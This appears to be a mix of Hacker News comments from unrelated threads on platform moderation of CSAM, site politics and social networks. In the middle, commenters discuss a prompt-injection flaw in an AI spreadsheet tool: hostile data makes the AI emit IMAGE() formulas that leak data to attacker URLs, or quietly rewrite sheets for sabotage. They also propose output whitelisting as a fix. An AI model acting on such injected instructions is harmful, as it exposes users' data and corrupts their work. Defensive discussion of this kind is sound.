In what regard is it incorrect that a single, larger entity that is at least notionally committed to avoiding the existence of any specific type of content on their platform is more likely to successfully avoid the existence of that type of content on their platform than smaller entities with less resources?
Now consider that some of those smaller entities might not be even notionally interested in avoiding the existence of that specific type of content on their platform, and are small enough for regulators to be unaware of its existence?
Yeah, I agree with you. Of course, it’s not Meta’s blame that the CSAM actually exists, but calling the problem of filtering it extremely difficult at Meta’s scale is a problem that is easily solvable but fundamentally requires changing how the platform works, and would likely require a lot more money to be spent.
It's probably why this "vulnerability" feels like the type of defects you'd see in Windows or desktop applications 20+ years ago.
The root cause was and a complete lack of effort to even attempt to secure things because no one had thought to do so, and now we're starting all over again at a new computing layer. Cloud was somewhat similar, but not nearly as bad.
It's bizarre to me since presumably someone who learned the lessons before is still working, but also great for my job security.
What about this is a vulnerability, let alone one that requires responsible disclosure?
Untrusted data sources can provide data that causes bad things to occur. If that's a vulnerability, then any application that ingests data is riddled with vulnerabilities.
I agree that the behavior should change from a default of allowing external network requests to denying them, but this "report" reads like overly dramatic marketing BS.
> Untrusted data sources can provide data that causes bad things to occur. If that's a vulnerability, then any application that ingests data is riddled with vulnerabilities.
There's an important difference between "the import had bad numbers so the report is wrong" versus "the import had a virus and now our network is compromised."
They are not the same kind of failure, they don't have the same impacts, and they don't involve the same mechanisms for prevention, detection, or remediation.
It's not all that different from people realizing that several popular model servers didn't support access control and could execute commands. It's an inherent part of the design that was rather naive from a security perspective, not something that requires coordinated disclosure or the rest of the security theater described in this marketing release.
Can be cheap fix here is whitelisting the output? If the AI can only emit a known set of formulas, you can't inject IMAGE() with arbitrary URLs cuz the output channel doesn't support it. You can't inject what the emitter can't produce. Doesn't fix all prompt injection but kills the exfiltration class.
The other is that an attacker can sneak something in that arbitrarily rewrites your spreadsheet. Triggers could be on content, or on a pre-planned attack time across many instances. Impacts could be subtly-flawed conclusions, or coarser "it stopped working and the deadline is looming" sabotage.
"Yeah boss, I sent out the checks to every vendor listed in the spreadsheet, what's wrong?"
What troubling language and slurs are you referring to exactly?
I didn't see anything "troubling" (let alone "extremely troubling") or anything that would indicate that anyone other than the implicated authors have an integrity issue.
I didn't immediately see a red flag that would make me discount all of their work. It's clear what the author's general opinions are. They're entitled to them of course.
I don't any signs that it's a bot, or that the comment was LLM generated. It's pretty safe to assume they made an alt to make that comment, as they didn't want to take a negative opinion towards a conservative author on their main. i.e. trying to avoid controversy.
This website is slightly to the right of reddit these days; what exactly would expressing a negative opinion about a conservative blogger do to their main account?
My suspicion was some affiliation with a current or future implicated individual.
I figured it was someone who just cared enough to make an account.
Yeah, this article seems fine, but looking at some of chris brunet's other articles has me a bit O.O
First time I've run into this with a HN share in a good long while. Not that the article shouldn't have been shared, ofc, but.. it certainly puts me on guard.
Yes, I'm saying that HN is very far left, which wasn't the case just a few years ago. It's mostly a progressive echo chamber at this point plus some interesting tech news.
The point of the line is not that they aren't going to try, it's an acknowledgement of the extreme challenge in diversifying in the short term and incentivizing the next generations who are very, very comfortable with the status quo to build other income streams in the long term.
It is good to point out this alternative is 90% likely going to be a rugpull on "nice cosy 90s style social network" by systemic factors. Regardless of the intent of the owner.
I just realised federated helps re. censorship but not privacy/secrecy needs.
I mean.. yeah. That's why no "Facebook like 2007" social networks have happened since. It would have to be run by someone with a lot of built up trust in order for people to trust it in the way that people did with Facebook. The world has been burnt.
If say, Valve started a social network I would consider using it because they've had decades to screw up Steam and they haven't. It is a bit outside their wheelhouse though.
I was about to respond saying what a terrible article it was, as it reads as if the author has no idea what he was talking about. Attempting to paraphrase the original article would explain it.
Now consider that some of those smaller entities might not be even notionally interested in avoiding the existence of that specific type of content on their platform, and are small enough for regulators to be unaware of its existence?
reply